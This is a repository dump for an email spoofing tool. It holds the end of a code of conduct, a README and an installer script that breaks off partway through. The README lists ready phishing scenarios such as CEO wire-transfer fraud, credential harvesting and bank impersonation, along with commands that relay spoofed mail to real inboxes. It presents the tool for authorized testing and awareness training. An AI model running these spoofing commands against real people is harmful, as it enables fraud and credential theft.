190 | use the software.
191 |
192 | ## Contact Information
193 |
194 | For questions about this Code of Conduct:
195 | * **General Questions**: Open a GitHub Discussion
196 | * **Code of Conduct Violations**: [contact@techskyhub.com](mailto:contact@techskyhub.com)
197 | * **Security Issues**: [contact@techskyhub.com](mailto:contact@techskyhub.com)
198 | * **Legal Concerns**: [contact@techskyhub.com](mailto:contact@techskyhub.com)
199 |
200 | Last updated: June 2025
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # EST - Email Spoofing Tool
2 |
3 |
4 |
5 | 
6 |
12 |
13 | **Professional Email Security Assessment Framework**
14 |
15 | *For authorized penetration testing, security research, and educational purposes*
16 |
17 |
18 |
19 | ## 🎯 Overview
20 |
21 | EST (Email Spoofing Tool) is a comprehensive, professional-grade framework designed for authorized email security assessments, penetration testing, and cybersecurity education. This tool demonstrates email spoofing vulnerabilities and helps security professionals evaluate the effectiveness of email authentication mechanisms.
22 |
23 | ### ⚠️ Legal Disclaimer
24 |
25 | **EST is intended for authorized security testing and educational purposes only.** Users must obtain explicit written permission before testing any systems they do not own or have authorization to test. Unauthorized use of this tool may violate local, state, and federal laws. The developers assume no liability for misuse or damage caused by this program.
26 |
27 | ## ✨ Key Features
28 |
29 | ### 🔧 Core Capabilities
30 | - **Professional SMTP Server** - Multi-threaded, RFC-compliant SMTP server for testing
31 | - **Pre-built Attack Scenarios** - 5 realistic email spoofing scenarios covering common attack vectors
32 | - **Custom Test Creation** - Build and execute custom spoofing tests with full control
33 | - **Comprehensive Logging** - Detailed audit trails for all security tests
34 | - **Assessment Reporting** - Generate professional security assessment reports
35 | - **Real-time Email Relay** - Automatic delivery to real email destinations for testing
36 | - **Python 3.13+ Compatible** - Works with the latest Python versions, including on Kali Linux
37 |
38 | ### 🎭 Attack Scenarios Included
39 |
40 | | Scenario | Category | Severity | Description |
41 | |----------|----------|----------|-------------|
42 | | CEO Fraud | Business Email Compromise | 🔴 Critical | Executive impersonation for wire transfer fraud |
43 | | IT Helpdesk | Technical Support Fraud | 🟠 High | IT support impersonation for credential harvesting |
44 | | PayPal Security | Financial Services Phishing | 🟠 High | Payment service spoofing for account compromise |
45 | | Microsoft 365 | Software/License Fraud | 🟡 Medium | License expiration scam for credential theft |
46 | | Bank Alert | Financial Institution Fraud | 🔴 Critical | Banking institution impersonation |
47 |
48 | ### 🏗️ Architecture
49 |
50 | ```
51 | EST Framework
52 | ├── SMTP Testing Server (Multi-threaded)
53 | ├── Scenario Engine (Pre-built + Custom)
54 | ├── Email Relay System (MX Resolution)
55 | ├── Audit & Logging System
56 | ├── Report Generation Engine
57 | ├── Python Environment Manager (3.13+ compatible)
58 | └── Professional CLI Interface
59 | ```
60 |
61 | ## 🚀 Quick Start
62 |
63 | ### Prerequisites
64 | - Python 3.8 or higher (including Python 3.13+)
65 | - Linux/macOS/Windows (optimized for Kali Linux)
66 | - Network connectivity for email delivery testing
67 |
68 | ### Installation
69 |
70 | #### 🐧 Kali Linux / Python 3.13+ (Recommended)
71 |
72 | ```bash
73 | # Clone the repository
74 | git clone https://github.com/techsky-eh/EST.git
75 | cd EST
76 |
77 | # Make installer executable
78 | chmod +x install.sh
79 |
80 | # Run the fixed installer (handles Python 3.13+ automatically)
81 | ./install.sh
82 | ```
83 |
84 | The installer will automatically:
85 | - Detect Python 3.13+ and create a virtual environment
86 | - Install system dependencies via apt
87 | - Handle externally-managed-environment issues
88 | - Create isolated Python environment for EST
89 |
90 | #### 🖥️ Other Linux Distributions
91 |
92 | ```bash
93 | # Clone the repository
94 | git clone https://github.com/techsky-eh/EST.git
95 | cd EST
96 |
97 | # Install dependencies
98 | pip install -r requirements.txt
99 |
100 | # Install system-wide (optional); run as a regular user - install.sh exits when started as root and calls sudo itself
101 | ./install.sh
102 | ```
103 |
104 | #### 🍎 macOS
105 |
106 | ```bash
107 | # Install Python and dependencies
108 | brew install python3 telnet
109 |
110 | # Clone and install EST
111 | git clone https://github.com/techsky-eh/EST.git
112 | cd EST
113 | ./install.sh
114 | ```
115 |
116 | ### Basic Usage
117 |
118 | ```bash
119 | # Start SMTP testing server
120 | est server --port 2525
121 |
122 | # List available attack scenarios
123 | est list
124 |
125 | # Execute CEO fraud scenario
126 | est test 1 target@company.com
127 |
128 | # Run custom spoofing test
129 | est custom --from-email "ceo@company.com" \
130 | --from-name "John Smith, CEO" \
131 | --subject "Urgent Request" \
132 | --body "Please handle this immediately" \
133 | --target "employee@company.com"
134 |
135 | # View test logs
136 | est logs --lines 50
137 |
138 | # Generate assessment report
139 | est report
140 | ```
141 |
142 | ## 📚 Comprehensive Documentation
143 |
144 | ### Command Reference
145 |
146 | #### Server Operations
147 | ```bash
148 | # Start SMTP server (standard port, requires sudo)
149 | sudo est server --port 25
150 |
151 | # Start on unprivileged port (recommended)
152 | est server --port 2525
153 |
154 | # Bind to specific interface
155 | est server --host 192.168.1.100 --port 2525
156 | ```
157 |
158 | #### Testing Operations
159 | ```bash
160 | # List all scenarios with details
161 | est list
162 |
163 | # Execute specific scenario by ID
164 | est test <scenario_id> <target_email>
165 |
166 | # Execute with custom SMTP server
167 | est test 1 target@company.com --smtp-host mail.company.com --smtp-port 25
168 |
169 | # Custom spoofing test
170 | est custom --from-email <from_email> \
171 | --from-name <from_name> \
172 | --subject <subject> \
173 | --body <body> \
174 | --target <target_email>
175 | ```
176 |
177 | #### Monitoring & Reporting
178 | ```bash
179 | # View recent test logs
180 | est logs
181 |
182 | # View more log entries
183 | est logs --lines 100
184 |
185 | # Generate comprehensive report
186 | est report
187 |
188 | # Generate report to specific file
189 | est report --output /path/to/report.json
190 | ```
191 |
192 | ### Configuration
193 |
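194 | EST stores configuration in `~/.est/config.json`. A `host` of `0.0.0.0`, as in the example below, binds the listener to every network interface; use `127.0.0.1` or a lab-only address (the `--host` option does the same on the command line) when the test server should not be reachable from other networks: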
195 |
196 | ```json
197 | {
198 | "version": "2.0.1",
199 | "smtp_server": {
200 | "host": "0.0.0.0",
201 | "port": 2525,
202 | "timeout": 30
203 | },
204 | "scenarios": [
205 | {
206 | "name": "Custom CEO Fraud",
207 | "category": "Business Email Compromise",
208 | "from_email": "ceo@yourcompany.com",
209 | "from_name": "Your CEO Name",
210 | "subject": "Urgent Business Matter",
211 | "body": "Custom email body...",
212 | "description": "Custom scenario description",
213 | "severity": "Critical"
214 | }
215 | ],
216 | "temp_email_services": [
217 | "guerrillamail.com",
218 | "mailinator.com"
219 | ]
220 | }
221 | ```
222 |
223 | ## 🔬 Advanced Usage
224 |
225 | ### Professional Assessment Workflow
226 |
227 | 1. **Environment Setup**
228 | ```bash
229 | # Start EST server in isolated environment
230 | est server --port 2525
231 | ```
232 |
233 | 2. **Baseline Testing**
234 | ```bash
235 | # Test with temporary email addresses first
236 | est test 1 test@guerrillamail.com
237 | est test 2 test@mailinator.com
238 | ```
239 |
240 | 3. **Target Assessment**
241 | ```bash
242 | # Execute scenarios against target domain
243 | est test 1 employee@target-company.com
244 | est test 3 finance@target-company.com
245 | ```
246 |
247 | 4. **Custom Attack Simulation**
248 | ```bash
249 | # Company-specific spoofing tests
250 | est custom --from-email "ceo@target-company.com" \
251 | --from-name "Target CEO Name" \
252 | --subject "Quarterly Budget Review" \
253 | --body "Please review attached budget..." \
254 | --target "cfo@target-company.com"
255 | ```
256 |
257 | 5. **Results Analysis**
258 | ```bash
259 | # Review logs and generate report
260 | est logs --lines 100
261 | est report --output assessment_report.json
262 | ```
263 |
264 | ### Integration with Security Testing
265 |
266 | EST integrates seamlessly with other security testing tools:
267 |
268 | ```bash
269 | # Use with network analysis
270 | tcpdump -i any port 25 &
271 | est test 1 target@company.com
272 |
273 | # Combine with social engineering toolkit
274 | # Use EST for email component of broader campaigns
275 |
276 | # Integration with reporting frameworks
277 | est report --output ./reports/email_assessment.json
278 | ```
279 |
280 | ## 📊 Sample Output
281 |
282 | ### Scenario Execution
283 | ```
284 | 🎯 Executing Email Spoofing Test
285 | ────────────────────────────────────────
286 | 📧 Scenario: CEO Fraud - Urgent Wire Transfer
287 | 🏷️ Category: Business Email Compromise
288 | ⚠️ Severity: Critical
289 | 📤 Spoofed From: John Smith, CEO
290 | 📥 Target: employee@company.com
291 | 📡 SMTP Server: localhost:2525
292 | 🕐 Timestamp: 2024-03-15 14:30:22
293 |
294 | 🚀 Initiating SMTP connection...
295 | 📤 Sending spoofed email...
296 | ✅ Email spoofing test completed successfully!
297 | 📋 Check target inbox: employee@company.com
298 | ```
299 |
300 | ### Assessment Report Summary
301 | ```
302 | 📋 EST Security Assessment Summary
303 | ══════════════════════════════════════════════════
304 | 📊 Total Tests: 15
305 | ✅ Successful: 12
306 | ❌ Failed: 3
307 | 📈 Success Rate: 80.0%
308 | 🔴 Risk Level: CRITICAL - Immediate action required
309 |
310 | 📚 Recommendations: 8 items
311 | • 🔴 CRITICAL: High email spoofing success rate detected
312 | • Implement SPF, DKIM, and DMARC email authentication
313 | • Configure email security gateways with spoofing detection
314 | ... and 5 more
315 | ```
316 |
317 | ## 🛡️ Security Best Practices
318 |
319 | ### For Security Professionals
320 | - **Always obtain written authorization** before conducting tests
321 | - **Use isolated test environments** when possible
322 | - **Document all testing activities** for compliance
323 | - **Follow responsible disclosure** for any vulnerabilities found
324 | - **Respect privacy and confidentiality** of all test data
325 |
326 | ### Recommended Test Environment
327 | - Isolated network segment for testing
328 | - Virtual machines for server deployment
329 | - Temporary email services for initial validation
330 | - Proper logging and monitoring infrastructure
331 |
332 | ### Legal Compliance
333 | - Obtain explicit written permission from system owners
334 | - Ensure compliance with local and international laws
335 | - Document the scope and limitations of testing
336 | - Maintain confidentiality of test results
337 | - Follow organizational security policies
338 |
339 | ## 🔧 Troubleshooting
340 |
341 | ### Python 3.13+ / Kali Linux Issues
342 |
343 | **Problem**: `externally-managed-environment` error
344 | ```bash
345 | # Solution 1: Use the fixed installer (automatically creates venv)
346 | ./install.sh
347 |
348 | # Solution 2: Manual virtual environment
349 | python3 -m venv ~/.est-env
350 | source ~/.est-env/bin/activate
351 | pip install dnspython
352 |
353 | # Solution 3: Use system packages
354 | sudo apt install python3-dnspython
355 | ```
356 |
357 | **Problem**: Virtual environment not found
358 | ```bash
359 | # Solution: Reinstall or recreate environment
360 | rm -rf ~/.est-env
361 | ./install.sh
362 |
363 | # Or manually recreate
364 | python3 -m venv ~/.est-env
365 | source ~/.est-env/bin/activate
366 | pip install -r requirements.txt
367 | ```
368 |
369 | ### Common Issues
370 |
371 | **Port Permission Denied**
372 | ```bash
373 | # Solution: Use unprivileged port or run as root
374 | est server --port 2525
375 | # OR
376 | sudo est server --port 25
377 | ```
378 |
379 | **DNS Resolution Failures**
380 | ```bash
381 | # Install DNS library
382 | sudo apt install python3-dnspython
383 | # OR in virtual environment
384 | source ~/.est-env/bin/activate
385 | pip install dnspython
386 | ```
387 |
388 | **Email Delivery Failures**
389 | ```bash
390 | # Check SMTP server logs
391 | est logs
392 |
393 | # Verify target email service is accessible
394 | dig MX target-domain.com
395 |
396 | # Test with known working temporary email services
397 | est test 1 test@guerrillamail.com
398 | ```
399 |
400 | **Command Not Found**
401 | ```bash
402 | # Run directly if not installed system-wide
403 | python3 est.py --help
404 |
405 | # Or reinstall
406 | ./install.sh
407 |
408 | # Check if virtual environment is needed
409 | source ~/.est-env/bin/activate
410 | est --help
411 | ```
412 |
413 | ### Environment Verification
414 |
415 | ```bash
416 | # Check EST installation
417 | est --help
418 |
419 | # Verify Python environment
420 | python3 -c "import dns.resolver; print('DNS module working')"
421 |
422 | # Check virtual environment (if used)
423 | echo $VIRTUAL_ENV
424 |
425 | # Test basic functionality
426 | est list
427 | ```
428 |
429 | ## 🎓 Educational Use Cases
430 |
431 | ### Security Awareness Training
432 | - Demonstrate realistic email spoofing attacks
433 | - Show participants how phishing emails are crafted
434 | - Test user awareness and response procedures
435 | - Provide hands-on experience with email security
436 |
437 | ### Academic Research
438 | - Study email authentication mechanisms
439 | - Analyze effectiveness of security controls
440 | - Research social engineering techniques
441 | - Develop new detection methods
442 |
443 | ### Penetration Testing (Authorized)
444 | - Assess organizational email security posture
445 | - Test effectiveness of SPF/DKIM/DMARC policies
446 | - Evaluate user susceptibility to social engineering
447 | - Validate email security gateway configurations
448 |
449 | ## 🤝 Contributing
450 |
451 | We welcome contributions from the security community:
452 |
453 | 1. **Fork the repository**
454 | 2. **Create a feature branch** (`git checkout -b feature/amazing-feature`)
455 | 3. **Commit your changes** (`git commit -m 'Add amazing feature'`)
456 | 4. **Push to the branch** (`git push origin feature/amazing-feature`)
457 | 5. **Open a Pull Request**
458 |
459 | ### Development Guidelines
460 | - Follow PEP 8 style guidelines
461 | - Add comprehensive docstrings
462 | - Include unit tests for new features
463 | - Update documentation as needed
464 | - Ensure compatibility with Python 3.8+
465 | - Test with both virtual environments and system Python
466 |
467 | ## 🐧 Kali Linux Optimization
468 |
469 | EST is specifically optimized for Kali Linux:
470 |
471 | ### Features
472 | - **Automatic virtual environment setup** for Python 3.13+
473 | - **System package integration** with apt
474 | - **Network interface binding** for pentesting environments
475 | - **Integration with Kali tools** and workflows
476 |
477 | ### Installation
478 | ```bash
479 | # One-command installation on Kali
480 | ./install.sh
481 |
482 | # Manual method for Kali
483 | sudo apt install python3-dnspython telnet dnsutils
484 | python3 -m venv ~/.est-env
485 | source ~/.est-env/bin/activate
486 | pip install setuptools wheel
487 | python3 est.py --help
488 | ```
489 |
490 | ### Usage in Penetration Testing
491 | ```bash
492 | # Professional pentest workflow
493 | est server --port 2525 &
494 | est test 1 target@victim.com
495 | est report --output /root/pentest-reports/email-assessment.json
496 |
497 | # Integration with other tools
498 | tcpdump -i any port 25 &
499 | est test 1 target@example.com
500 | ```
501 |
502 | ## 📄 License
503 |
504 | This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
505 |
506 | ## 🔄 Changelog
507 |
508 | ### v2.0.1 (2025-06-12)
509 | - **Fixed Python 3.13+ compatibility** - Automatic virtual environment creation
510 | - **Enhanced Kali Linux support** - Optimized installation for latest Kali
511 | - **Improved error handling** - Better externally-managed-environment handling
512 | - **Updated documentation** - Comprehensive troubleshooting for modern Python
513 | - **System package integration** - Prefer apt packages over pip when available
514 |
515 | ### v2.0.0 (2025-06-12)
516 | - Complete rewrite for professional security testing
517 | - Multi-threaded SMTP server with real-time email relay
518 | - 5 realistic attack scenarios covering major threat vectors
519 | - Professional CLI interface with comprehensive logging
520 | - Cross-platform compatibility and desktop integration
521 |
522 | ## 🙏 Acknowledgments
523 |
524 | - Security research community for vulnerability insights
525 | - Email authentication standards organizations
526 | - Open source contributors and maintainers
527 | - Educational institutions supporting cybersecurity research
528 | - Kali Linux team for providing excellent penetration testing platform
529 |
530 | ## 📞 Support & Contact
531 |
532 | - **Issues**: [GitHub Issues](https://github.com/techsky-eh/EST/issues)
533 | - **Documentation**: [Wiki](https://github.com/techsky-eh/EST/wiki)
534 | - **Security Reports**: contact@techskyhub.com
535 | - **General Questions**: contact@techskyhub.com
536 |
537 | ### Quick Support
538 |
539 | For common issues:
540 | 1. **Python 3.13+ problems**: Use `./install.sh` (auto-creates venv)
541 | 2. **Kali Linux issues**: Install via `sudo apt install python3-dnspython`
542 | 3. **Permission errors**: Use `est server --port 2525` instead of port 25
543 | 4. **Command not found**: Run `source ~/.est-env/bin/activate` then try again
544 |
545 | ---
546 |
547 |
548 |
549 | **EST v2.0.1** - Professional Email Security Assessment Framework
550 |
551 | Compatible with Python 3.8+ including Python 3.13+ and Kali Linux
552 |
553 | Made with ❤️ by the Tech Sky - Security Research Team
554 |
555 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #
3 | # EST - Email Spoofing Tool
4 | # Professional Installation Script for Linux Systems (Fixed for Python 3.13+)
5 | #
6 | # Author: Security Research Team
7 | # Version: 2.0.1
8 | # License: MIT
9 | #
10 |
# Abort the installer as soon as any command exits non-zero.
set -e

# ANSI colour escapes for terminal output. They are stored as literal
# backslash sequences and only become colours when printed with `echo -e`.
declare -r RED='\033[0;31m'
declare -r GREEN='\033[0;32m'
declare -r YELLOW='\033[1;33m'
declare -r BLUE='\033[0;34m'
declare -r PURPLE='\033[0;35m'
declare -r CYAN='\033[0;36m'
declare -r NC='\033[0m' # No Color (resets attributes)

# Tool identity shown in the banner.
declare -r TOOL_NAME="EST - Email Spoofing Tool"
declare -r TOOL_VERSION="2.0.1"
declare -r TOOL_AUTHOR="Tech Sky - SRT"

# Install locations. INSTALL_DIR and BIN_LINK are system paths that the
# installer writes through sudo; VENV_DIR lives in the invoking user's home.
declare -r INSTALL_DIR="/opt/est"
declare -r BIN_LINK="/usr/local/bin/est"
declare -r DESKTOP_DIR="/usr/share/applications"
declare -r ICON_DIR="/usr/share/pixmaps"
declare -r VENV_DIR="$HOME/.est-env"
31 |
32 | # Status functions
# Print the installer banner: a blue box with the tool name, version,
# intended-use lines and author, followed by one blank line.
print_banner() {
    local row
    local -a rows=(
        "╔══════════════════════════════════════════════════════════════╗"
        "║ EST INSTALLER v${TOOL_VERSION} ║"
        "║ Email Spoofing Tool - Professional ║"
        "║ ║"
        "║ Advanced Email Security Assessment Framework ║"
        "║ For Authorized Penetration Testing Only ║"
        "║ Educational & Research Purposes ║"
        "║ ║"
        "║ Author: ${TOOL_AUTHOR}${NC}${BLUE} ║"
        "╚══════════════════════════════════════════════════════════════╝"
    )

    # Every row is wrapped in the same colour-on / colour-off pair.
    for row in "${rows[@]}"; do
        echo -e "${BLUE}${row}${NC}"
    done
    echo
}
46 |
# Print a success line: green "[✓]" marker followed by the message in $1.
print_status() {
    local message="$1"
    echo -e "${GREEN}[✓]${NC} ${message}"
}
50 |
# Print a warning line: yellow "[!]" marker followed by the message in $1.
print_warning() {
    local message="$1"
    echo -e "${YELLOW}[!]${NC} ${message}"
}
54 |
# Print an error line: red "[✗]" marker followed by the message in $1.
# Output goes to stdout, like the other print_* helpers.
print_error() {
    local message="$1"
    echo -e "${RED}[✗]${NC} ${message}"
}
58 |
# Print an informational line: blue "[i]" marker followed by the message in $1.
print_info() {
    local message="$1"
    echo -e "${BLUE}[i]${NC} ${message}"
}
62 |
# Print a step heading: purple "[→]" marker followed by the message in $1.
print_step() {
    local message="$1"
    echo -e "${PURPLE}[→]${NC} ${message}"
}
66 |
# Refuse to run with an effective UID of 0. The installer is started by a
# regular user and invokes sudo itself for the steps that need root, so only
# those commands run privileged.
check_root() {
    if [[ $EUID -ne 0 ]]; then
        return 0
    fi

    print_error "Please don't run this script as root!"
    echo -e "${YELLOW}💡 Run as regular user with sudo access: ./install.sh${NC}"
    exit 1
}
75 |
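# Check that the host can run EST and decide how Python packages are installed.
#
# Sets these globals for the later install steps:
#   PYTHON_VERSION, PYTHON_MAJOR, PYTHON_MINOR - version of python3 on PATH
#   USE_VENV - true when dependencies must go into a virtual environment
#   IS_KALI  - true when /etc/os-release mentions Kali
# Exits with status 1 when python3 is missing or older than 3.8.
check_system() {
    print_step "Checking system compatibility..."

    # Check OS
    case "$OSTYPE" in
        linux-gnu*) print_status "Linux system detected" ;;
        darwin*)    print_status "macOS system detected" ;;
        *)          print_warning "Unsupported OS detected, proceeding anyway..." ;;
    esac

    # Check Python 3
    if ! command -v python3 &> /dev/null; then
        print_error "Python 3 is not installed"
        echo "Please install Python 3.8 or higher:"
        echo " Ubuntu/Debian: sudo apt install python3 python3-pip"
        echo " CentOS/RHEL: sudo yum install python3 python3-pip"
        echo " macOS: brew install python3"
        exit 1
    fi

    # Check Python version. %-formatting is used instead of an f-string so
    # that an interpreter older than 3.6 still reaches the version error
    # below rather than dying on a SyntaxError under `set -e`.
    PYTHON_VERSION=$(python3 -c "import sys; print('%d.%d' % sys.version_info[:2])")
    PYTHON_MAJOR=${PYTHON_VERSION%%.*}
    PYTHON_MINOR=${PYTHON_VERSION#*.}

    if [ "$PYTHON_MAJOR" -ne 3 ] || [ "$PYTHON_MINOR" -lt 8 ]; then
        print_error "Python 3.8+ required, found $PYTHON_VERSION"
        exit 1
    fi
    print_status "Python $PYTHON_VERSION detected (compatible)"

    # Give both flags a value on every path so later steps never compare
    # against an unset variable (IS_KALI used to stay unset when
    # /etc/os-release does not exist).
    USE_VENV=false
    IS_KALI=false

    # PEP 668: a distribution marks its interpreter as externally managed by
    # shipping an EXTERNALLY-MANAGED file in the stdlib directory. That marker
    # is independent of the Python minor version, so probe for it directly and
    # keep the 3.13+ rule as a fallback. Using a venv here avoids installing
    # with --break-system-packages later on.
    if python3 -c "import os, sys, sysconfig; sys.exit(not os.path.exists(os.path.join(sysconfig.get_path('stdlib'), 'EXTERNALLY-MANAGED')))"; then
        print_warning "Externally managed Python detected - will use virtual environment"
        USE_VENV=true
    elif [ "$PYTHON_MINOR" -ge 13 ]; then
        print_warning "Python 3.13+ detected - will use virtual environment"
        USE_VENV=true
    fi

    # Check if we're on Kali Linux
    if [ -f /etc/os-release ] && grep -q "Kali" /etc/os-release; then
        print_status "Kali Linux detected - using optimized installation"
        IS_KALI=true
        USE_VENV=true # Always use venv on Kali
    fi

    print_status "System compatibility check passed"
}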
132 |
# Install OS-level dependencies with the first package manager found, probing
# in the order apt, yum, dnf, pacman, brew.
#
# Sets SYSTEM_DNS_INSTALLED to true when the branch installed the distribution's
# dnspython package, false otherwise.
#
# Side effects worth knowing before running this on a shared machine:
#   - every Linux branch calls sudo;
#   - the yum, dnf and pacman branches upgrade all installed packages
#     (`update -y` / `-Syu`) before installing anything.
# NOTE(review): python3-venv is requested in the yum and dnf branches too;
# confirm the name resolves there, since `set -e` aborts the installer when a
# package install fails.
install_dependencies() {
    print_step "Installing system dependencies..."

    # Pick the package manager once, keeping the original probe order.
    local pkg_manager="" candidate
    for candidate in apt yum dnf pacman brew; do
        if command -v "$candidate" &> /dev/null; then
            pkg_manager="$candidate"
            break
        fi
    done

    case "$pkg_manager" in
        apt)
            print_info "Using apt package manager (Debian/Ubuntu/Kali)"
            sudo apt update

            # Install core dependencies
            sudo apt install -y \
                python3-dev \
                python3-pip \
                python3-setuptools \
                python3-wheel \
                python3-venv \
                telnet \
                dnsutils \
                curl \
                git

            # Install Python DNS library via apt (preferred for system packages)
            if sudo apt install -y python3-dnspython; then
                print_status "DNS library installed via system package manager"
                SYSTEM_DNS_INSTALLED=true
            else
                print_warning "System DNS package not available, will install via pip"
                SYSTEM_DNS_INSTALLED=false
            fi
            ;;

        yum)
            print_info "Using yum package manager (CentOS/RHEL)"
            sudo yum update -y
            sudo yum install -y \
                python3-devel \
                python3-pip \
                python3-setuptools \
                python3-venv \
                telnet \
                bind-utils \
                curl \
                git
            SYSTEM_DNS_INSTALLED=false
            ;;

        dnf)
            print_info "Using dnf package manager (Fedora)"
            sudo dnf update -y
            sudo dnf install -y \
                python3-devel \
                python3-pip \
                python3-setuptools \
                python3-venv \
                telnet \
                bind-utils \
                curl \
                git \
                python3-dns
            SYSTEM_DNS_INSTALLED=true
            ;;

        pacman)
            print_info "Using pacman package manager (Arch Linux)"
            sudo pacman -Syu --noconfirm
            sudo pacman -S --noconfirm \
                python \
                python-pip \
                python-setuptools \
                python-virtualenv \
                inetutils \
                bind \
                curl \
                git \
                python-dnspython
            SYSTEM_DNS_INSTALLED=true
            ;;

        brew)
            print_info "Using Homebrew (macOS)"
            brew install python3 telnet
            SYSTEM_DNS_INSTALLED=false
            ;;

        *)
            print_warning "Unknown package manager, will install Python dependencies manually"
            SYSTEM_DNS_INSTALLED=false
            ;;
    esac

    print_status "System dependencies installed successfully"
}
219 |
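# Prepare the Python environment EST runs in.
#
# Reads USE_VENV and SYSTEM_DNS_INSTALLED (set by the earlier steps) and sets
# PYTHON_ENV to "venv" or "system".
#   USE_VENV=true : recreates $VENV_DIR from scratch, activates it in this
#                   shell and makes sure dnspython is importable inside it.
#   otherwise     : installs dnspython, setuptools and wheel with
#                   `pip3 install --user`, falling back to the system package.
# Exits with status 1 when no installation method works.
setup_python_environment() {
    print_step "Setting up Python environment..."

    if [ "$USE_VENV" = true ]; then
        print_info "Creating isolated Python virtual environment..."

        # Remove existing venv if it exists
        if [ -d "$VENV_DIR" ]; then
            print_warning "Removing existing virtual environment..."
            rm -rf -- "$VENV_DIR"
        fi

        # Create new virtual environment
        python3 -m venv "$VENV_DIR"
        print_status "Virtual environment created at $VENV_DIR"

        # Activate virtual environment
        source "$VENV_DIR/bin/activate"
        print_status "Virtual environment activated"

        # Upgrade pip in virtual environment
        pip install --upgrade pip setuptools wheel

        # Install Python dependencies in virtual environment
        print_info "Installing Python dependencies in virtual environment..."
        # The venv is created without --system-site-packages, so a dnspython
        # installed by the system package manager is not importable from it.
        # Probe the venv interpreter instead of trusting SYSTEM_DNS_INSTALLED;
        # skipping the install here left the venv without the DNS library.
        if python -c "import dns.resolver" 2> /dev/null; then
            print_status "DNS library already available in virtual environment"
        else
            pip install dnspython
            print_status "DNS library installed in virtual environment"
        fi

        PYTHON_ENV="venv"

    else
        print_info "Using system Python environment..."

        # Try to install dependencies
        print_info "Installing Python dependencies..."

        # Try different installation methods
        if pip3 install --user dnspython setuptools wheel 2> /dev/null; then
            print_status "Dependencies installed via pip --user"
        elif pip3 install --user --break-system-packages dnspython setuptools wheel 2> /dev/null; then
            # This path overrides the distribution's externally-managed
            # marker, so report it as a warning rather than a plain success.
            print_warning "Dependencies installed with --break-system-packages (distribution pip protection overridden)"
        elif [ "$SYSTEM_DNS_INSTALLED" = true ]; then
            print_status "Using system-installed DNS library"
        else
            print_error "Failed to install Python dependencies"
            echo "Please install manually:"
            echo " sudo apt install python3-dnspython # Debian/Ubuntu"
            echo " pip3 install --user dnspython # Manual install"
            exit 1
        fi

        PYTHON_ENV="system"
    fi

    print_status "Python environment setup completed ($PYTHON_ENV)"
}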
281 |
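# Create the installation tree under $INSTALL_DIR and the per-user data
# directory ~/.est (exported as USER_CONFIG_DIR).
#
# $INSTALL_DIR is created with sudo and then handed to the invoking user so
# the remaining install steps can copy files without root.
#
# NOTE(review): after this step everything under $INSTALL_DIR is writable by
# the installing user, and install_tool points the system-wide command
# $BIN_LINK at a script inside it. The README also shows `sudo est server
# --port 25`, in which case root executes a user-writable file. Consider
# copying the files with sudo and leaving the tree root-owned.
setup_directories() {
    print_step "Setting up installation directories..."

    # Resolve the owner once and keep it quoted; `id -un` also works when
    # $USER is not set in the environment.
    local owner
    owner="$(id -un):$(id -gn)"

    # Create main installation directory
    if [ ! -d "$INSTALL_DIR" ]; then
        sudo mkdir -p "$INSTALL_DIR"
        sudo chown "$owner" "$INSTALL_DIR"
        print_status "Created installation directory: $INSTALL_DIR"
    fi

    # Create subdirectories
    sudo mkdir -p "$INSTALL_DIR"/{bin,lib,docs,examples}
    sudo chown -R "$owner" "$INSTALL_DIR"

    # Create user configuration directory
    USER_CONFIG_DIR="$HOME/.est"
    mkdir -p "$USER_CONFIG_DIR"/{reports,logs,scenarios}
    # Reports and logs of test runs are stored here; keep them readable by
    # the owner only.
    chmod 700 "$USER_CONFIG_DIR"
    print_status "Created user configuration directory: $USER_CONFIG_DIR"

    print_status "Directory structure created"
}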
304 |
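# Copy EST into $INSTALL_DIR and expose it as a system-wide command.
#
# Must be run from the directory that contains est.py; exits with status 1
# when the file is missing. Copies est.py to $INSTALL_DIR/bin, generates the
# wrapper through create_wrapper_script, links $BIN_LINK to the wrapper with
# sudo, and copies the documentation and example files that are present.
install_tool() {
    print_step "Installing EST tool..."

    # Check if main script exists
    if [ ! -f "est.py" ]; then
        print_error "est.py not found in current directory"
        echo "Please ensure you have the EST source files:"
        echo " - est.py (main application)"
        echo " - requirements.txt (dependencies)"
        echo " - README.md (documentation)"
        exit 1
    fi

    # Copy main application
    cp est.py "$INSTALL_DIR/bin/"
    chmod +x "$INSTALL_DIR/bin/est.py"
    print_status "Installed main application"

    # Create wrapper script based on Python environment
    create_wrapper_script

    # Create symbolic link. The link target sits in a directory owned by the
    # installing user, so the system-wide command runs whatever that user
    # leaves there.
    sudo ln -sf "$INSTALL_DIR/bin/est" "$BIN_LINK"
    print_status "Created system-wide command link"

    # Copy documentation
    if [ -f "README.md" ]; then
        cp README.md "$INSTALL_DIR/docs/"
        print_status "Installed documentation"
    fi

    # Copy requirements.txt if it exists
    if [ -f "requirements.txt" ]; then
        cp requirements.txt "$INSTALL_DIR/docs/"
        print_status "Installed requirements file"
    fi

    # Copy other documentation files
    local doc
    for doc in CHANGELOG.md CONTRIBUTING.md CODE_OF_CONDUCT.md LICENSE; do
        if [ -f "$doc" ]; then
            cp "$doc" "$INSTALL_DIR/docs/"
        fi
    done

    # Copy examples if they exist. "examples/." copies the directory's
    # contents without a glob, so an empty examples/ no longer makes cp fail
    # and abort the installer under `set -e`.
    if [ -d "examples" ]; then
        cp -r examples/. "$INSTALL_DIR/examples/"
        print_status "Installed example configurations"
    fi

    print_status "EST tool installation completed"
}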
358 |
359 | # Create wrapper script for better user experience
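create_wrapper_script() {
    # Generate $INSTALL_DIR/bin/est, the launcher that $BIN_LINK points at.
    #
    # The heredoc delimiters are unquoted, so $INSTALL_DIR and $VENV_DIR are
    # baked in at install time; every \$ survives as a literal $ and is
    # evaluated when the wrapper runs.
    #
    # Reads: USE_VENV, INSTALL_DIR, VENV_DIR, PYTHON_ENV
    if [ "$USE_VENV" = true ]; then
        # Create wrapper that uses virtual environment
        cat > "$INSTALL_DIR/bin/est" << EOF
#!/bin/bash
#
# EST - Email Spoofing Tool Wrapper Script (Virtual Environment)
# This script activates the virtual environment and runs EST
#

INSTALL_DIR="$INSTALL_DIR"
MAIN_SCRIPT="\$INSTALL_DIR/bin/est.py"
VENV_DIR="$VENV_DIR"

# Check if virtual environment exists
if [ ! -d "\$VENV_DIR" ]; then
    echo "❌ EST virtual environment not found at \$VENV_DIR"
    echo "💡 Try reinstalling: ./install.sh"
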